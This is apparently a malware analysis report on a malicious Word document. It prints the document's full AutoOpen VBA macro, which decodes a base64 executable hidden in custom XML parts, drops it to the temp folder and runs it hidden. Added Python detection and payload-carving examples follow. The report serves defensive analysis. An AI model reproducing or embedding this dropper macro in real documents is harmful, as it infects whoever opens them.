Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 b83ab0be6521421d…

Verdict: MALICIOUS

File type: Office (OOXML) / .DOCX
Size: 86.1 KB
Created: 2013-12-23 23:15:00 UTC
Authoring application: Microsoft Macintosh Word 14.0000
First seen: 2026-06-21
MD5: 56438db81a13d38b4fffb57fc848ff10
SHA-1: cf2099567cc48841d64c024d5f26dab7969a3395
SHA-256: b83ab0be6521421dd0ae1f231b0393b7678bd12cf14faad64a568cfd1cf52b6c
Risk score: 240

Heuristics 9

  • VBA project inside OOXML [medium] OOXML_VBA (6 related findings)
    Document contains a VBA project: VBA macros present.
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Matched lines in script:
        ' 5. Execute
        Dim shell As Object
        Set shell = CreateObject("WScript.Shell")
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    Matched lines in script:
        Dim shell As Object
        Set shell = CreateObject("WScript.Shell")
        shell.Run exePath, 0, False ' 0 = Hidden, False = Don't wait
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched lines in script:
        Dim xmlNode As Object
        Set xmlDoc = CreateObject("MSXML2.DOMDocument")
        Set xmlNode = xmlDoc.createElement("b64")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched lines in script:
        Sub AutoOpen()
            On Error Resume Next
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Matched lines in script:
        ' 2. Prepare paths
        tempPath = Environ("TEMP")
        ' Randomize filename for uniqueness
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Every URL below was found in document text (OOXML body / shared strings). The schemas.openxmlformats.org and schemas.microsoft.com/office entries are the standard namespace URIs that every Word document declares and carry no signal on their own. Two entries are not normal Word markup and are the ones to follow up: the webhook.site URL, and the Windows Task Scheduler XML namespace (the .../windows/2004/02/mit/task entry).
      • https://webhook.site/a72d8905-b15f-4e95-9a8f-5e4bb7dc9b3d
      • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
      • http://schemas.microsoft.com/office/mac/office/2008/main
      • http://schemas.openxmlformats.org/markup-compatibility/2006
      • http://schemas.openxmlformats.org/officeDocument/2006/relationships
      • http://schemas.openxmlformats.org/officeDocument/2006/math
      • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
      • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
      • http://schemas.openxmlformats.org/wordprocessingml/2006/main
      • http://schemas.microsoft.com/office/word/2010/wordml
      • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
      • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
      • http://schemas.microsoft.com/office/word/2006/wordml
      • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
      • http://schemas.microsoft.com/windows/2004/02/mit/task^
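The heuristics above each fire on one token class in the decoded VBA source. What makes this sample malicious is not any single token but the chain they form: an auto-exec entry point, a decoded blob written to disk, and a hidden WScript.Shell launch of that file. The Python scanner below is an added example, not part of this report or its analysis engine. It applies the same classes of checks to a constructed excerpt modelled on the macro (embedded inline as sample input, alongside a constructed benign macro as a negative control) and turns the fired rules into a chain-based verdict. Rule IDs follow the report's naming; the weights and the two IDs OLE_VBA_B64DECODE and OLE_VBA_WRITE_EXE are this example's own assumptions, not the report's scoring.

```python
import re

# Constructed excerpt modelled on the AutoOpen macro in this report, embedded so the
# scanner runs offline. It is sample input, not the carved artifact itself.
SAMPLE_VBA = """Sub AutoOpen()
    On Error Resume Next
    tempPath = Environ("TEMP")
    exePath = tempPath & "\\sys_update_" & Int((9999 - 1000 + 1) * Rnd + 1000) & ".exe"
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")
    xmlNode.DataType = "bin.base64"
    Open exePath For Binary Access Write As #fNum
    Set shell = CreateObject("WScript.Shell")
    shell.Run exePath, 0, False
End Sub
"""

# Constructed benign macro used as a negative control: auto-exec alone is not malicious.
BENIGN_VBA = """Sub AutoOpen()
    ActiveDocument.Range.Font.Name = "Calibri"
End Sub
"""

# (rule id, weight, pattern). IDs mirror the report's naming scheme; the weights and the
# last two IDs are assumptions made for this example, not the report's own scoring.
RULES = [
    ("OLE_VBA_AUTOOPEN",  1, re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+(?:AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b", re.I)),
    ("OLE_VBA_ENVIRON",   1, re.compile(r"\bEnviron\s*\(", re.I)),
    ("OLE_VBA_CREATEOBJ", 3, re.compile(r"\bCreateObject\s*\(", re.I)),
    ("OLE_VBA_WSCRIPT",   5, re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"', re.I)),
    ("OLE_VBA_SHELL",     5, re.compile(r"\.Run\s+\S+\s*,\s*0\b|\bShell\s*\(", re.I)),
    ("OLE_VBA_B64DECODE", 3, re.compile(r"bin\.base64", re.I)),
    ("OLE_VBA_WRITE_EXE", 3, re.compile(r"\bOpen\s+\S+\s+For\s+Binary\s+Access\s+Write\b", re.I)),
]

AUTOEXEC = {"OLE_VBA_AUTOOPEN"}
EXECUTE = {"OLE_VBA_WSCRIPT", "OLE_VBA_SHELL"}
STAGE = {"OLE_VBA_B64DECODE", "OLE_VBA_WRITE_EXE"}


def scan(source: str) -> dict[str, list[tuple[int, str]]]:
    """Return {rule_id: [(line_no, line), ...]} for every rule that matches a line."""
    hits: dict[str, list[tuple[int, str]]] = {}
    for line_no, line in enumerate(source.splitlines(), start=1):
        for rule_id, _weight, pattern in RULES:
            if pattern.search(line):
                hits.setdefault(rule_id, []).append((line_no, line.strip()))
    return hits


def score(hits: dict) -> int:
    """Sum each fired rule's weight once, however many lines matched it."""
    return sum(weight for rule_id, weight, _ in RULES if rule_id in hits)


def verdict(hits: dict) -> str:
    """Combine rule families into the behaviour chain instead of counting tokens:
    auto-exec entry point AND an execution primitive AND a payload staged to disk."""
    fired = set(hits)
    if fired & AUTOEXEC and fired & EXECUTE and fired & STAGE:
        return "malicious"      # full drop-and-execute chain, as in this report's sample
    if fired & EXECUTE:
        return "suspicious"     # execution primitive without a visible staging step
    return "low"                # auto-exec or helper calls alone are common in benign macros


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        h = scan(src)
        print(f"{name}: score={score(h)} verdict={verdict(h)}")
        for rule_id, matches in h.items():
            for line_no, text in matches:
                print(f"  {rule_id:<20} L{line_no}: {text}")
```

The verdict deliberately keys on rule families rather than on the score, which is why the benign control stays at "low" even though it has the same AutoOpen entry point: the scoring is what the report's risk number summarises, the chain is what an analyst would write in the finding.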

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2720 bytes
SHA-256: 6e5367f46c72c13005207f1dc5da0661fe98fe75e869567e5b84ea9259f67c14
Preview script (first 1,000 lines of the extracted script):
Sub AutoOpen()
    On Error Resume Next
    Dim xmlPart As Object
    Dim base64String As String
    Dim tempPath As String
    Dim exePath As String
    Dim binaryData() As Byte
    Dim fNum As Integer
    
    ' 1. Locate the payload in CustomXMLParts
    ' We search for the <payload> tag
    For Each xmlPart In ActiveDocument.CustomXMLParts
        If xmlPart.DocumentElement.BaseName = "payload" Then
            base64String = xmlPart.DocumentElement.Text
            Exit For
        End If
    Next xmlPart

    If base64String = "" Then Exit Sub

    ' 2. Prepare paths
    tempPath = Environ("TEMP")
    ' Randomize filename for uniqueness
    exePath = tempPath & "\sys_update_" & Int((9999 - 1000 + 1) * Rnd + 1000) & ".exe"

    ' 3. Decode Base64 (using MSXML2.DOMDocument for decoding)
    Dim xmlDoc As Object
    Dim xmlNode As Object
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")
    xmlNode.DataType = "bin.base64"
    xmlNode.Text = base64String
    binaryData = xmlNode.nodeTypedValue

    ' 4. Write to disk
    fNum = FreeFile
    Open exePath For Binary Access Write As #fNum
    Put #fNum, , binaryData
    Close #fNum

    ' 5. Execute
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run exePath, 0, False ' 0 = Hidden, False = Don't wait

End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 17408 bytes
SHA-256: 7a76c878bc07c25938f3ca7c9f29af5086c6e10d5487603f8a3fcd5dc11d3b25
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s))
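The AutoOpen macro makes no network request. According to its own code the payload travels inside the document: it walks ActiveDocument.CustomXMLParts for a part whose root element is named payload, decodes that element's text with MSXML's bin.base64 data type, writes the bytes to %TEMP%\sys_update_NNNN.exe (NNNN is 1000 to 9999, from Int(9000 * Rnd + 1000)) and launches it hidden via WScript.Shell. The webhook.site URL listed under the heuristics sits in the document body, not in the macro. The Python below is an added example, not part of this report's tooling: it carves the payload from a DOCX the same way the macro locates it (root element name, namespace ignored, as MSXML's BaseName does) so it can be hashed and checked for an MZ header without running the macro, and it checks filenames against the drop-name pattern the macro generates. It runs against a constructed stand-in document built in memory, not the analysed sample; build_sample_docx, FAKE_PE and DROP_NAME_RE are this example's own.

```python
import base64
import hashlib
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# Constructed stand-in for the dropped executable: an MZ header with no real code.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 24

# The macro names the drop file Environ("TEMP") & "\sys_update_" & Int(9000 * Rnd + 1000) & ".exe",
# i.e. sys_update_<1000..9999>.exe. This regex is the example's own rendering of that pattern.
DROP_NAME_RE = re.compile(r"sys_update_[1-9]\d{3}\.exe", re.I)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def local_name(tag: str) -> str:
    """ElementTree tags look like '{namespace}name'; MSXML's BaseName drops the namespace, so do we."""
    return tag.rsplit("}", 1)[-1]


def carve_custom_xml_payloads(docx_bytes: bytes, root_name: str = "payload") -> list[dict]:
    """Find customXml/*.xml parts whose root element is `root_name` (namespace ignored),
    base64-decode their text as the macro does, and report size, hash and PE-header facts."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in sorted(zf.namelist()):
            low = name.lower()
            # itemPropsN.xml parts hold schema references, not data; skip them.
            if not (low.startswith("customxml/") and low.endswith(".xml")) or "itemprops" in low:
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue
            if local_name(root.tag) != root_name:
                continue
            text = "".join((root.text or "").split())   # bin.base64 tolerates embedded whitespace
            try:
                blob = base64.b64decode(text, validate=True)
            except ValueError:
                continue
            found.append({
                "part": name,
                "size": len(blob),
                "sha256": sha256_hex(blob),
                "is_pe": blob[:2] == b"MZ",
            })
    return found


def is_expected_drop_name(filename: str) -> bool:
    """True if a filename matches the sys_update_NNNN.exe pattern the macro generates."""
    return DROP_NAME_RE.fullmatch(filename) is not None


def build_sample_docx() -> bytes:
    """Constructed minimal OOXML zip (not the analysed sample) with one <payload> custom XML
    part carrying FAKE_PE as base64, one itemProps part and one unrelated custom XML part."""
    payload_xml = ('<payload xmlns="urn:constructed-example">'
                   + base64.b64encode(FAKE_PE).decode("ascii") + "</payload>")
    other_xml = '<properties xmlns="urn:constructed-example"><title>Untitled</title></properties>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("customXml/item1.xml", payload_xml)
        zf.writestr("customXml/itemProps1.xml",
                    '<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml"/>')
        zf.writestr("customXml/item2.xml", other_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in carve_custom_xml_payloads(build_sample_docx()):
        print(hit)
    print(is_expected_drop_name("sys_update_4821.exe"), is_expected_drop_name("sys_update_99.exe"))
```

Point it at the real sample by passing the file's bytes in place of build_sample_docx(). If no customXml part with a payload root turns up, the blob may live elsewhere: the triage entry above reports one long base64-like blob inside word/vbaProject.bin as well, so that stream is the next place to look. On the detection side, the drop name plus its location (winword.exe writing and then launching %TEMP%\sys_update_NNNN.exe) is the host artefact worth hunting for, since the file hash changes with every build of the payload but the naming scheme is fixed in the macro.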